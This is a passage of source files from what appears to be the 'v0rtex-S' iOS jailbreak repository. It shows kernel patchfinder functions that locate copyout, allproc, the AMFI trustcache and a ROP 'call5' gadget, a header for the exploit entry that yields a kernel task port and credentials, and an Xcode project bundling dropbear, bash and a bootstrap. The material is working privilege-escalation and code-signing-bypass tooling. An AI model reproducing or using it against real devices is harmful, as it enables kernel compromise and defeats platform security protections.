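            return xnucore_base + off + 8 + 4 + kerndumpbase;
        }
    }
    return 0;
}

/*
 * Locate copyout(): take the second reference to its "transfer too large"
 * string and walk back at most 0x100 instructions for the
 * `SUB SP, SP, #0x50` prologue.  Returns that offset plus kerndumpbase, or 0.
 */
uint64_t find_copyout(void) {
    // n == 2: the second reference to the string, not the first
    addr_t ref = find_strref("\"%s(%p, %p, %lu) - transfer too large\"", 2, 0);
    if (!ref) {
        return 0;
    }
    ref -= kerndumpbase;

    uint64_t start = 0;
    for (int i = 4; i < 0x100*4; i+=4) {
        if ((addr_t)i > ref) {
            break;  /* would read in front of the image */
        }
        uint32_t op = *(uint32_t*)(kernel+ref-i);
        if (op == 0xd10143ff) { // SUB SP, SP, #0x50
            start = ref-i;
            break;
        }
    }
    if (!start) {
        return 0;
    }

    return start + kerndumpbase;
}

/*
 * Locate bzero(): find the `SYS #3, c7, c4, #1, X3` instruction in
 * __TEXT_EXEC and return the start of the function containing it
 * (plus kerndumpbase), or 0.
 */
uint64_t find_bzero(void) {
    // Just find SYS #3, c7, c4, #1, X3, then get the start of that function
    addr_t off;
    addr_t hit = 0;
    int found = 0;
    uint32_t *k;
    k = (uint32_t *)(kernel + xnucore_base);
    for (off = 0; off < xnucore_size - 4; off += 4, k++) {
        if (k[0] == 0xd50b7423) {
            hit = xnucore_base + off;
            found = 1;
            break;
        }
    }
    /* the original fell through with `off` one past the segment end and
     * handed that bare offset to bof64(); report "not found" instead */
    if (!found) {
        return 0;
    }

    uint64_t start = bof64(kernel, xnucore_base, hit);
    if (!start) {
        return 0;
    }

    return start + kerndumpbase;
}

/*
 * Locate bcopy(): it swaps x0/x1 and falls into memmove, so match that
 * four-instruction shuffle (`MOV X3,X0; MOV X0,X1; MOV X1,X3; NOP`) in
 * __TEXT_EXEC first, then in the prelinked text.  Returns its address
 * (plus kerndumpbase) or 0.
 */
addr_t find_bcopy(void) {
    // Jumps straight into memmove after switching x0 and x1 around
    // Guess we just find the switch and that's it
    addr_t off;
    uint32_t *k;
    k = (uint32_t *)(kernel + xnucore_base);
    /* four words are compared, so stop 16 bytes before the segment end */
    for (off = 0; off + 16 <= xnucore_size; off += 4, k++) {
        if (k[0] == 0xAA0003E3 && k[1] == 0xAA0103E0 && k[2] == 0xAA0303E1 && k[3] == 0xd503201F) {
            return off + xnucore_base + kerndumpbase;
        }
    }
    k = (uint32_t *)(kernel + prelink_base);
    for (off = 0; off + 16 <= prelink_size; off += 4, k++) {
        if (k[0] == 0xAA0003E3 && k[1] == 0xAA0103E0 && k[2] == 0xAA0303E1 && k[3] == 0xd503201F) {
            return off + prelink_base + kerndumpbase;
        }
    }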
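return 0;
}

/*
 * Common prologue of find_trustcache() and find_amficache(): from the
 * prelinked-text reference to "com.apple.MobileFileIntegrity", step to the
 * second BL that follows it and resolve its target.  Returns the callee's
 * offset into the image, or 0 after printing which step failed.
 */
static addr_t
amfi_second_call_target(void)
{
    addr_t call, func;
    addr_t ref = find_strref("com.apple.MobileFileIntegrity", 1, 1);
    if (!ref) {
        printf("didnt find string ref\n");
        return 0;
    }
    ref -= kerndumpbase;
    call = step64(kernel, ref, 32, INSN_CALL);
    if (!call) {
        printf("couldn't find the call\n");
        return 0;
    }
    call = step64(kernel, call+4, 32, INSN_CALL);
    /* the second search was unchecked before: a miss handed offset 0 to
     * follow_call64(), which then decoded whatever sits at the start of
     * the image */
    if (!call) {
        printf("couldn't find the call\n");
        return 0;
    }
    func = follow_call64(kernel, call);
    if (!func) {
        printf("couldn't follow the call\n");
        return 0;
    }
    return func;
}

/*
 * Value of x8 after the first four instructions of the function reached via
 * amfi_second_call_target().  Returns it plus kerndumpbase, or 0.
 */
addr_t find_trustcache(void) {
    addr_t func, val;
    func = amfi_second_call_target();
    if (!func) {
        return 0;
    }
    val = calc64(kernel, func, func + 16, 8);
    if (!val) {
        return 0;
    }
    return val + kerndumpbase;
}

/*
 * Value of x9 at the function reached via amfi_second_call_target(),
 * emulated from the nearest prologue bof64() finds within the preceding
 * 256 bytes.  Returns it plus kerndumpbase, or 0.
 */
addr_t find_amficache(void) {
    addr_t func, bof, val;
    func = amfi_second_call_target();
    if (!func) {
        return 0;
    }
    bof = bof64(kernel, func - 256, func);
    if (!bof) {
        printf("couldn't find the start of the function\n");
        return 0;
    }
    val = calc64(kernel, bof, func, 9);
    if (!val) {
        printf("couldn't find x9\n");
        return 0;
    }
    return val + kerndumpbase;
}

// #ifdef HAVE_MAIN

/* extra_recipe **************************************************************/

/* STR X8, [Xn, #imm]: opcode plus Rt == 8 */
#define INSN_STR8 0xF9000000 | 8, 0xFFC00000 | 0x1F

addr_t
find_AGXCommandQueue_vtable(void)
{
    addr_t val, str8;
    addr_t ref = find_strref("AGXCommandQueue",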
1, 1); 1074 | if (!ref) { 1075 | return 0; 1076 | } 1077 | val = find_register_value(ref, 0); 1078 | if (!val) { 1079 | return 0; 1080 | } 1081 | ref = find_reference(val, 1, 1); 1082 | if (!ref) { 1083 | return 0; 1084 | } 1085 | ref -= kerndumpbase; 1086 | str8 = step64(kernel, ref, 32, INSN_STR8); 1087 | if (!str8) { 1088 | return 0; 1089 | } 1090 | val = calc64(kernel, ref, str8, 8); 1091 | if (!val) { 1092 | return 0; 1093 | } 1094 | return val + kerndumpbase; 1095 | } 1096 | 1097 | addr_t 1098 | find_allproc(void) 1099 | { 1100 | addr_t val, bof, str8; 1101 | addr_t ref = find_strref("\"pgrp_add : pgrp is dead adding process\"", 1, 0); 1102 | if (!ref) { 1103 | return 0; 1104 | } 1105 | ref -= kerndumpbase; 1106 | bof = bof64(kernel, xnucore_base, ref); 1107 | if (!bof) { 1108 | return 0; 1109 | } 1110 | str8 = step64_back(kernel, ref, ref - bof, INSN_STR8); 1111 | if (!str8) { 1112 | return 0; 1113 | } 1114 | val = calc64(kernel, bof, str8, 8); 1115 | if (!val) { 1116 | return 0; 1117 | } 1118 | return val + kerndumpbase; 1119 | } 1120 | 1121 | addr_t 1122 | find_call5(void) 1123 | { 1124 | addr_t bof; 1125 | uint8_t gadget[] = { 0x95, 0x5A, 0x40, 0xF9, 0x68, 0x02, 0x40, 0xF9, 0x88, 0x5A, 0x00, 0xF9, 0x60, 0xA2, 0x40, 0xA9 }; 1126 | uint8_t *str = boyermoore_horspool_memmem(kernel + prelink_base, prelink_size, gadget, sizeof(gadget)); 1127 | if (!str) { 1128 | return 0; 1129 | } 1130 | bof = bof64(kernel, prelink_base, str - kernel); 1131 | if (!bof) { 1132 | return 0; 1133 | } 1134 | return bof + kerndumpbase; 1135 | } 1136 | 1137 | addr_t 1138 | find_realhost(addr_t priv) 1139 | { 1140 | addr_t val; 1141 | if (!priv) { 1142 | return 0; 1143 | } 1144 | priv -= kerndumpbase; 1145 | val = calc64(kernel, priv, priv + 12, 0); 1146 | if (!val) { 1147 | return 0; 1148 | } 1149 | return val + kerndumpbase; 1150 | } 1151 | 1152 | #include 1153 | 1154 | addr_t 1155 | find_symbol(const char *symbol) 1156 | { 1157 | unsigned i; 1158 | const struct mach_header *hdr = 
kernel_mh; 1159 | const uint8_t *q; 1160 | int is64 = 0; 1161 | 1162 | if (IS64(hdr)) { 1163 | is64 = 4; 1164 | } 1165 | 1166 | /* XXX will only work on a decrypted kernel */ 1167 | if (!kernel_delta) { 1168 | return 0; 1169 | } 1170 | 1171 | /* XXX I should cache these. ohwell... */ 1172 | q = (uint8_t *)(hdr + 1) + is64; 1173 | for (i = 0; i < hdr->ncmds; i++) { 1174 | const struct load_command *cmd = (struct load_command *)q; 1175 | if (cmd->cmd == LC_SYMTAB) { 1176 | const struct symtab_command *sym = (struct symtab_command *)q; 1177 | const char *stroff = (const char *)kernel + sym->stroff + kernel_delta; 1178 | if (is64) { 1179 | uint32_t k; 1180 | const struct nlist_64 *s = (struct nlist_64 *)(kernel + sym->symoff + kernel_delta); 1181 | for (k = 0; k < sym->nsyms; k++) { 1182 | if (s[k].n_type & N_STAB) { 1183 | continue; 1184 | } 1185 | if (s[k].n_value && (s[k].n_type & N_TYPE) != N_INDR) { 1186 | if (!strcmp(symbol, stroff + s[k].n_un.n_strx)) { 1187 | /* XXX this is an unslid address */ 1188 | return s[k].n_value; 1189 | } 1190 | } 1191 | } 1192 | } 1193 | } 1194 | q = q + cmd->cmdsize; 1195 | } 1196 | return 0; 1197 | } 1198 | 1199 | /* test **********************************************************************/ 1200 | 1201 | /* 1202 | int 1203 | main(int argc, char **argv) 1204 | { 1205 | int rv; 1206 | addr_t base = 0; 1207 | const addr_t vm_kernel_slide = 0; 1208 | rv = init_kernel(base, (argc > 1) ? 
argv[1] : "krnl"); 1209 | assert(rv == 0); 1210 | 1211 | addr_t AGXCommandQueue_vtable = find_AGXCommandQueue_vtable(); 1212 | printf("\t\t\t0x%llx\n", AGXCommandQueue_vtable - vm_kernel_slide); 1213 | addr_t OSData_getMetaClass = find_symbol("__ZNK6OSData12getMetaClassEv"); 1214 | printf("\t\t\t0x%llx\n", OSData_getMetaClass); 1215 | addr_t OSSerializer_serialize = find_symbol("__ZNK12OSSerializer9serializeEP11OSSerialize"); 1216 | printf("\t\t\t0x%llx\n", OSSerializer_serialize); 1217 | addr_t k_uuid_copy = find_symbol("_uuid_copy"); 1218 | printf("\t\t\t0x%llx\n", k_uuid_copy); 1219 | addr_t allproc = find_allproc(); 1220 | printf("\t\t\t0x%llx\n", allproc); 1221 | addr_t realhost = find_realhost(find_symbol("_host_priv_self") + vm_kernel_slide); 1222 | printf("\t\t\t0x%llx\n", realhost - vm_kernel_slide); 1223 | addr_t call5 = find_call5(); 1224 | printf("\t\t\t0x%llx\n", call5 - vm_kernel_slide); 1225 | 1226 | assert(find_symbol("_rootvnode") == find_gPhysBase() + 0x38 - vm_kernel_slide); 1227 | 1228 | term_kernel(); 1229 | return 0; 1230 | }*/ 1231 | 1232 | // #endif /* HAVE_MAIN */ 1233 | -------------------------------------------------------------------------------- /v0rtex-S/the_super_fun_part/patchfinder64.h: -------------------------------------------------------------------------------- 1 | #ifndef PATCHFINDER64_H_ 2 | #define PATCHFINDER64_H_ 3 | 4 | #import "common.h" 5 | #import 6 | 7 | int init_patchfinder(task_t tfp0, uint64_t base, const char *filename); 8 | void term_kernel(void); 9 | 10 | enum { SearchInCore, SearchInPrelink }; 11 | 12 | uint64_t find_register_value(uint64_t where, int reg); 13 | uint64_t find_reference(uint64_t to, int n, int prelink); 14 | uint64_t find_strref(const char *string, int n, int prelink); 15 | uint64_t find_gPhysBase(void); 16 | uint64_t find_kernel_pmap(void); 17 | uint64_t find_amfiret(void); 18 | uint64_t find_ret_0(void); 19 | uint64_t find_amfi_memcmpstub(void); 20 | uint64_t find_sbops(void); 21 | uint64_t 
find_lwvm_mapio_patch(void); 22 | uint64_t find_lwvm_mapio_newj(void); 23 | 24 | uint64_t find_entry(void); 25 | const unsigned char *find_mh(void); 26 | 27 | uint64_t find_cpacr_write(void); 28 | uint64_t find_str(const char *string); 29 | uint64_t find_amfiops(void); 30 | uint64_t find_sysbootnonce(void); 31 | uint64_t find_trustcache(void); 32 | uint64_t find_amficache(void); 33 | 34 | uint64_t find_allproc(void); 35 | 36 | #endif 37 | -------------------------------------------------------------------------------- /v0rtex-S/v0rtex.h: -------------------------------------------------------------------------------- 1 | #ifndef V0RTEX_H 2 | #define V0RTEX_H 3 | 4 | #include 5 | 6 | #include "common.h" 7 | 8 | typedef kern_return_t (*v0rtex_cb_t)(task_t tfp0, kptr_t kbase, void *data); 9 | kern_return_t v0rtex(v0rtex_cb_t callback, void *cb_data, task_t *tfp0, kptr_t *kslide, kptr_t *kernucred, kptr_t *selfproc); 10 | 11 | #endif 12 | -------------------------------------------------------------------------------- /v0rtex-s.xcodeproj/project.pbxproj: -------------------------------------------------------------------------------- 1 | // !$*UTF8*$! 
2 | { 3 | archiveVersion = 1; 4 | classes = { 5 | }; 6 | objectVersion = 48; 7 | objects = { 8 | 9 | /* Begin PBXBuildFile section */ 10 | 820EF0671FEAB0B2006104ED /* libjb.a in Frameworks */ = {isa = PBXBuildFile; fileRef = 820EF0661FEAB0B2006104ED /* libjb.a */; }; 11 | 820EF06A1FEAB30D006104ED /* patchfinder64.c in Sources */ = {isa = PBXBuildFile; fileRef = 820EF0681FEAB30D006104ED /* patchfinder64.c */; }; 12 | 82178E0A1FEAFAF3002975CE /* amfi.m in Sources */ = {isa = PBXBuildFile; fileRef = 82178E091FEAFAF3002975CE /* amfi.m */; }; 13 | 828494641FEC371E00C59308 /* bootstrap.tar in Resources */ = {isa = PBXBuildFile; fileRef = 828494631FEC371E00C59308 /* bootstrap.tar */; }; 14 | 82AC281F1FF15709001E436A /* extrainst_ in Resources */ = {isa = PBXBuildFile; fileRef = 82AC281E1FF15709001E436A /* extrainst_ */; }; 15 | 82B603DC1FEC555800241A80 /* tar in Resources */ = {isa = PBXBuildFile; fileRef = 82B603D71FEC555700241A80 /* tar */; }; 16 | 82B603DD1FEC555800241A80 /* bash in Resources */ = {isa = PBXBuildFile; fileRef = 82B603D81FEC555700241A80 /* bash */; }; 17 | 82B603DE1FEC555800241A80 /* launchctl in Resources */ = {isa = PBXBuildFile; fileRef = 82B603DA1FEC555800241A80 /* launchctl */; }; 18 | 82B603DF1FEC555800241A80 /* dropbear in Resources */ = {isa = PBXBuildFile; fileRef = 82B603DB1FEC555800241A80 /* dropbear */; }; 19 | 82EDD2FE1FF670A5003D49F5 /* jailbreakd.m in Sources */ = {isa = PBXBuildFile; fileRef = 82EDD2FD1FF670A4003D49F5 /* jailbreakd.m */; }; 20 | 82EDD3001FF67BC6003D49F5 /* cydo in Resources */ = {isa = PBXBuildFile; fileRef = 82EDD2FF1FF67BC6003D49F5 /* cydo */; }; 21 | B58B32401FE4EBA300EB7B47 /* kernel.m in Sources */ = {isa = PBXBuildFile; fileRef = B58B323D1FE4EBA300EB7B47 /* kernel.m */; }; 22 | B58B32441FE4ED3B00EB7B47 /* ls in Resources */ = {isa = PBXBuildFile; fileRef = B58B32431FE4ED3B00EB7B47 /* ls */; }; 23 | B58B32461FE4ED6300EB7B47 /* symbols.m in Sources */ = {isa = PBXBuildFile; fileRef = B58B32451FE4ED6300EB7B47 /* 
symbols.m */; }; 24 | B58B32491FE4F3DF00EB7B47 /* root-rw.m in Sources */ = {isa = PBXBuildFile; fileRef = B58B32481FE4F3DF00EB7B47 /* root-rw.m */; }; 25 | B5BB8F791FE4D97800B60FDC /* README.md in Resources */ = {isa = PBXBuildFile; fileRef = B5BB8F781FE4D97800B60FDC /* README.md */; }; 26 | EE5169281FDC2A7000805460 /* v0rtex.m in Sources */ = {isa = PBXBuildFile; fileRef = EE5169271FDC2A7000805460 /* v0rtex.m */; }; 27 | EE5252AE1FDA4F2F00993801 /* AppDelegate.m in Sources */ = {isa = PBXBuildFile; fileRef = EE5252AD1FDA4F2F00993801 /* AppDelegate.m */; }; 28 | EE5252B11FDA4F2F00993801 /* ViewController.m in Sources */ = {isa = PBXBuildFile; fileRef = EE5252B01FDA4F2F00993801 /* ViewController.m */; }; 29 | EE5252B41FDA4F2F00993801 /* Main.storyboard in Resources */ = {isa = PBXBuildFile; fileRef = EE5252B21FDA4F2F00993801 /* Main.storyboard */; }; 30 | EE5252B61FDA4F2F00993801 /* Assets.xcassets in Resources */ = {isa = PBXBuildFile; fileRef = EE5252B51FDA4F2F00993801 /* Assets.xcassets */; }; 31 | EE5252B91FDA4F2F00993801 /* LaunchScreen.storyboard in Resources */ = {isa = PBXBuildFile; fileRef = EE5252B71FDA4F2F00993801 /* LaunchScreen.storyboard */; }; 32 | EE5252BC1FDA4F2F00993801 /* main.m in Sources */ = {isa = PBXBuildFile; fileRef = EE5252BB1FDA4F2F00993801 /* main.m */; }; 33 | EE665E261FDC013D00FF457E /* IOKit.framework in Frameworks */ = {isa = PBXBuildFile; fileRef = EE665E251FDC013D00FF457E /* IOKit.framework */; }; 34 | /* End PBXBuildFile section */ 35 | 36 | /* Begin PBXFileReference section */ 37 | 820EF0661FEAB0B2006104ED /* libjb.a */ = {isa = PBXFileReference; lastKnownFileType = archive.ar; name = libjb.a; path = "v0rtex-S/the_super_fun_part/libjb.a"; sourceTree = ""; }; 38 | 820EF0681FEAB30D006104ED /* patchfinder64.c */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.c; name = patchfinder64.c; path = "v0rtex-S/the_super_fun_part/patchfinder64.c"; sourceTree = ""; }; 39 | 82178E091FEAFAF3002975CE /* amfi.m */ = {isa = 
PBXFileReference; lastKnownFileType = sourcecode.c.objc; name = amfi.m; path = "v0rtex-S/the_super_fun_part/amfi.m"; sourceTree = ""; }; 40 | 828494631FEC371E00C59308 /* bootstrap.tar */ = {isa = PBXFileReference; lastKnownFileType = archive.tar; name = bootstrap.tar; path = "v0rtex-S/bootstrap.tar"; sourceTree = ""; }; 41 | 8299A1741FEAB03D00BA3AB4 /* the_super_fun_part */ = {isa = PBXFileReference; lastKnownFileType = folder; path = the_super_fun_part; sourceTree = ""; }; 42 | 8299A1751FEAB04600BA3AB4 /* the_super_fun_part */ = {isa = PBXFileReference; lastKnownFileType = folder; path = the_super_fun_part; sourceTree = ""; }; 43 | 82AC281E1FF15709001E436A /* extrainst_ */ = {isa = PBXFileReference; lastKnownFileType = "compiled.mach-o.executable"; name = extrainst_; path = "v0rtex-S/extrainst_"; sourceTree = ""; }; 44 | 82B603D71FEC555700241A80 /* tar */ = {isa = PBXFileReference; lastKnownFileType = "compiled.mach-o.executable"; name = tar; path = "v0rtex-S/tar"; sourceTree = ""; }; 45 | 82B603D81FEC555700241A80 /* bash */ = {isa = PBXFileReference; lastKnownFileType = "compiled.mach-o.executable"; name = bash; path = "v0rtex-S/bash"; sourceTree = ""; }; 46 | 82B603D91FEC555700241A80 /* bootstrap.tar */ = {isa = PBXFileReference; lastKnownFileType = archive.tar; name = bootstrap.tar; path = "v0rtex-S/bootstrap.tar"; sourceTree = ""; }; 47 | 82B603DA1FEC555800241A80 /* launchctl */ = {isa = PBXFileReference; lastKnownFileType = "compiled.mach-o.executable"; name = launchctl; path = "v0rtex-S/launchctl"; sourceTree = ""; }; 48 | 82B603DB1FEC555800241A80 /* dropbear */ = {isa = PBXFileReference; lastKnownFileType = "compiled.mach-o.executable"; name = dropbear; path = "v0rtex-S/dropbear"; sourceTree = ""; }; 49 | 82EDD2FC1FF67097003D49F5 /* cydia */ = {isa = PBXFileReference; lastKnownFileType = folder; path = cydia; sourceTree = ""; }; 50 | 82EDD2FD1FF670A4003D49F5 /* jailbreakd.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; name = 
jailbreakd.m; path = "v0rtex-S/cydia/jailbreakd.m"; sourceTree = ""; }; 51 | 82EDD2FF1FF67BC6003D49F5 /* cydo */ = {isa = PBXFileReference; lastKnownFileType = "compiled.mach-o.executable"; name = cydo; path = "v0rtex-S/cydo"; sourceTree = ""; }; 52 | B58B323D1FE4EBA300EB7B47 /* kernel.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = kernel.m; sourceTree = ""; }; 53 | B58B323F1FE4EBA300EB7B47 /* kernel.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = kernel.h; sourceTree = ""; }; 54 | B58B32431FE4ED3B00EB7B47 /* ls */ = {isa = PBXFileReference; lastKnownFileType = "compiled.mach-o.executable"; path = ls; sourceTree = ""; }; 55 | B58B32451FE4ED6300EB7B47 /* symbols.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = symbols.m; sourceTree = ""; }; 56 | B58B32471FE4EDCF00EB7B47 /* symbols.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = symbols.h; sourceTree = ""; }; 57 | B58B32481FE4F3DF00EB7B47 /* root-rw.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = "root-rw.m"; sourceTree = ""; }; 58 | B58B324A1FE4F3F900EB7B47 /* root-rw.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = "root-rw.h"; sourceTree = ""; }; 59 | B5BB8F781FE4D97800B60FDC /* README.md */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = net.daringfireball.markdown; path = README.md; sourceTree = ""; }; 60 | EE5169271FDC2A7000805460 /* v0rtex.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = v0rtex.m; sourceTree = ""; }; 61 | EE5169291FDC2C9D00805460 /* common.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = common.h; sourceTree = ""; }; 62 | EE5252A91FDA4F2F00993801 /* v0rtex.app */ = {isa = PBXFileReference; explicitFileType = wrapper.application; includeInIndex = 0; path = v0rtex.app; sourceTree = 
BUILT_PRODUCTS_DIR; }; 63 | EE5252AC1FDA4F2F00993801 /* AppDelegate.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = AppDelegate.h; sourceTree = ""; }; 64 | EE5252AD1FDA4F2F00993801 /* AppDelegate.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = AppDelegate.m; sourceTree = ""; }; 65 | EE5252AF1FDA4F2F00993801 /* ViewController.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = ViewController.h; sourceTree = ""; }; 66 | EE5252B01FDA4F2F00993801 /* ViewController.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = ViewController.m; sourceTree = ""; }; 67 | EE5252B31FDA4F2F00993801 /* Base */ = {isa = PBXFileReference; lastKnownFileType = file.storyboard; name = Base; path = Base.lproj/Main.storyboard; sourceTree = ""; }; 68 | EE5252B51FDA4F2F00993801 /* Assets.xcassets */ = {isa = PBXFileReference; lastKnownFileType = folder.assetcatalog; path = Assets.xcassets; sourceTree = ""; }; 69 | EE5252B81FDA4F2F00993801 /* Base */ = {isa = PBXFileReference; lastKnownFileType = file.storyboard; name = Base; path = Base.lproj/LaunchScreen.storyboard; sourceTree = ""; }; 70 | EE5252BA1FDA4F2F00993801 /* Info.plist */ = {isa = PBXFileReference; lastKnownFileType = text.plist.xml; path = Info.plist; sourceTree = ""; }; 71 | EE5252BB1FDA4F2F00993801 /* main.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = main.m; sourceTree = ""; }; 72 | EE665E251FDC013D00FF457E /* IOKit.framework */ = {isa = PBXFileReference; lastKnownFileType = wrapper.framework; name = IOKit.framework; path = ../../../../../System/Library/Frameworks/IOKit.framework; sourceTree = ""; }; 73 | EE81AD151FDEF1AB0094418B /* v0rtex.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = v0rtex.h; sourceTree = ""; }; 74 | /* End PBXFileReference section */ 75 | 76 | /* Begin PBXFrameworksBuildPhase section */ 77 | EE5252A61FDA4F2F00993801 /* Frameworks */ = { 78 | isa = 
PBXFrameworksBuildPhase; 79 | buildActionMask = 2147483647; 80 | files = ( 81 | 820EF0671FEAB0B2006104ED /* libjb.a in Frameworks */, 82 | EE665E261FDC013D00FF457E /* IOKit.framework in Frameworks */, 83 | ); 84 | runOnlyForDeploymentPostprocessing = 0; 85 | }; 86 | /* End PBXFrameworksBuildPhase section */ 87 | 88 | /* Begin PBXGroup section */ 89 | EE5252A01FDA4F2F00993801 = { 90 | isa = PBXGroup; 91 | children = ( 92 | 82EDD2FF1FF67BC6003D49F5 /* cydo */, 93 | 82EDD2FD1FF670A4003D49F5 /* jailbreakd.m */, 94 | 82AC281E1FF15709001E436A /* extrainst_ */, 95 | 828494631FEC371E00C59308 /* bootstrap.tar */, 96 | 82B603D81FEC555700241A80 /* bash */, 97 | 82B603D91FEC555700241A80 /* bootstrap.tar */, 98 | 82B603DB1FEC555800241A80 /* dropbear */, 99 | 82B603DA1FEC555800241A80 /* launchctl */, 100 | 82B603D71FEC555700241A80 /* tar */, 101 | 82178E091FEAFAF3002975CE /* amfi.m */, 102 | 820EF0681FEAB30D006104ED /* patchfinder64.c */, 103 | B5BB8F781FE4D97800B60FDC /* README.md */, 104 | EE5252AB1FDA4F2F00993801 /* v0rtex-S */, 105 | EE5252AA1FDA4F2F00993801 /* Products */, 106 | EE665E201FDBFDB600FF457E /* Frameworks */, 107 | ); 108 | sourceTree = ""; 109 | }; 110 | EE5252AA1FDA4F2F00993801 /* Products */ = { 111 | isa = PBXGroup; 112 | children = ( 113 | EE5252A91FDA4F2F00993801 /* v0rtex.app */, 114 | ); 115 | name = Products; 116 | sourceTree = ""; 117 | }; 118 | EE5252AB1FDA4F2F00993801 /* v0rtex-S */ = { 119 | isa = PBXGroup; 120 | children = ( 121 | EEAC27D31FDDB0A3003C1801 /* Supporting Files */, 122 | B58B32431FE4ED3B00EB7B47 /* ls */, 123 | 82EDD2FC1FF67097003D49F5 /* cydia */, 124 | 8299A1751FEAB04600BA3AB4 /* the_super_fun_part */, 125 | EE5252BB1FDA4F2F00993801 /* main.m */, 126 | EE5252AC1FDA4F2F00993801 /* AppDelegate.h */, 127 | EE5252AD1FDA4F2F00993801 /* AppDelegate.m */, 128 | EE5252AF1FDA4F2F00993801 /* ViewController.h */, 129 | EE5252B01FDA4F2F00993801 /* ViewController.m */, 130 | EE5169291FDC2C9D00805460 /* common.h */, 131 | EE81AD151FDEF1AB0094418B 
/* v0rtex.h */, 132 | EE5169271FDC2A7000805460 /* v0rtex.m */, 133 | B58B323F1FE4EBA300EB7B47 /* kernel.h */, 134 | B58B323D1FE4EBA300EB7B47 /* kernel.m */, 135 | B58B32451FE4ED6300EB7B47 /* symbols.m */, 136 | B58B32471FE4EDCF00EB7B47 /* symbols.h */, 137 | B58B32481FE4F3DF00EB7B47 /* root-rw.m */, 138 | B58B324A1FE4F3F900EB7B47 /* root-rw.h */, 139 | ); 140 | path = "v0rtex-S"; 141 | sourceTree = ""; 142 | }; 143 | EE665E201FDBFDB600FF457E /* Frameworks */ = { 144 | isa = PBXGroup; 145 | children = ( 146 | 820EF0661FEAB0B2006104ED /* libjb.a */, 147 | EE665E251FDC013D00FF457E /* IOKit.framework */, 148 | ); 149 | name = Frameworks; 150 | sourceTree = ""; 151 | }; 152 | EEAC27D31FDDB0A3003C1801 /* Supporting Files */ = { 153 | isa = PBXGroup; 154 | children = ( 155 | 8299A1741FEAB03D00BA3AB4 /* the_super_fun_part */, 156 | EE5252BA1FDA4F2F00993801 /* Info.plist */, 157 | EE5252B51FDA4F2F00993801 /* Assets.xcassets */, 158 | EE5252B71FDA4F2F00993801 /* LaunchScreen.storyboard */, 159 | EE5252B21FDA4F2F00993801 /* Main.storyboard */, 160 | ); 161 | name = "Supporting Files"; 162 | sourceTree = ""; 163 | }; 164 | /* End PBXGroup section */ 165 | 166 | /* Begin PBXNativeTarget section */ 167 | EE5252A81FDA4F2F00993801 /* v0rtex */ = { 168 | isa = PBXNativeTarget; 169 | buildConfigurationList = EE5252BF1FDA4F2F00993801 /* Build configuration list for PBXNativeTarget "v0rtex" */; 170 | buildPhases = ( 171 | EE5252A51FDA4F2F00993801 /* Sources */, 172 | EE5252A61FDA4F2F00993801 /* Frameworks */, 173 | EE5252A71FDA4F2F00993801 /* Resources */, 174 | ); 175 | buildRules = ( 176 | ); 177 | dependencies = ( 178 | ); 179 | name = v0rtex; 180 | productName = v0rtex; 181 | productReference = EE5252A91FDA4F2F00993801 /* v0rtex.app */; 182 | productType = "com.apple.product-type.application"; 183 | }; 184 | /* End PBXNativeTarget section */ 185 | 186 | /* Begin PBXProject section */ 187 | EE5252A11FDA4F2F00993801 /* Project object */ = { 188 | isa = PBXProject; 189 | attributes = 
{ 190 | LastUpgradeCheck = 0900; 191 | ORGANIZATIONNAME = Sticktron; 192 | TargetAttributes = { 193 | EE5252A81FDA4F2F00993801 = { 194 | CreatedOnToolsVersion = 9.0; 195 | ProvisioningStyle = Automatic; 196 | }; 197 | }; 198 | }; 199 | buildConfigurationList = EE5252A41FDA4F2F00993801 /* Build configuration list for PBXProject "v0rtex-s" */; 200 | compatibilityVersion = "Xcode 8.0"; 201 | developmentRegion = en; 202 | hasScannedForEncodings = 0; 203 | knownRegions = ( 204 | en, 205 | Base, 206 | ); 207 | mainGroup = EE5252A01FDA4F2F00993801; 208 | productRefGroup = EE5252AA1FDA4F2F00993801 /* Products */; 209 | projectDirPath = ""; 210 | projectRoot = ""; 211 | targets = ( 212 | EE5252A81FDA4F2F00993801 /* v0rtex */, 213 | ); 214 | }; 215 | /* End PBXProject section */ 216 | 217 | /* Begin PBXResourcesBuildPhase section */ 218 | EE5252A71FDA4F2F00993801 /* Resources */ = { 219 | isa = PBXResourcesBuildPhase; 220 | buildActionMask = 2147483647; 221 | files = ( 222 | B58B32441FE4ED3B00EB7B47 /* ls in Resources */, 223 | 82B603DC1FEC555800241A80 /* tar in Resources */, 224 | 82B603DD1FEC555800241A80 /* bash in Resources */, 225 | 828494641FEC371E00C59308 /* bootstrap.tar in Resources */, 226 | 82AC281F1FF15709001E436A /* extrainst_ in Resources */, 227 | 82B603DE1FEC555800241A80 /* launchctl in Resources */, 228 | 82B603DF1FEC555800241A80 /* dropbear in Resources */, 229 | 82EDD3001FF67BC6003D49F5 /* cydo in Resources */, 230 | EE5252B91FDA4F2F00993801 /* LaunchScreen.storyboard in Resources */, 231 | EE5252B61FDA4F2F00993801 /* Assets.xcassets in Resources */, 232 | B5BB8F791FE4D97800B60FDC /* README.md in Resources */, 233 | EE5252B41FDA4F2F00993801 /* Main.storyboard in Resources */, 234 | ); 235 | runOnlyForDeploymentPostprocessing = 0; 236 | }; 237 | /* End PBXResourcesBuildPhase section */ 238 | 239 | /* Begin PBXSourcesBuildPhase section */ 240 | EE5252A51FDA4F2F00993801 /* Sources */ = { 241 | isa = 